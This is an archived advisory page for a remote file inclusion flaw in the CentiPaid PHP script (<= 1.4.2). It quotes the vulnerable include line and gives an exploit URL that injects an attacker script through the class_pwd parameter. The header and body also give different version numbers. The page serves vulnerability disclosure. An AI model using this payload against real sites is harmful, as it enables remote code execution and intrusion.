AOH :: HP Unsorted C :: B06-5474.HTM

AOH :: HP Unsorted C :: B06-5474.HTM
CentiPaid <= 1.4.2 Remote File Include

CentiPaid <= 1.4.2 Remote File Include CentiPaid <= 1.4.2 Remote File Include


Affected software description :
Application : CentiPaid
version : 1.4.3
URL : http://www.centipaid.com/centi/download/centipaid_php-1.4.3.tar.gz 

Code:centipaid_class.php

include($class_pwd.'/adodb/adodb.inc.php')


Exploit:

http://www.site.com/[path]/centipaid_class.php?class_pwd=[Evil_Script]

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better). Site design & layout copyright © 1986-2013 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.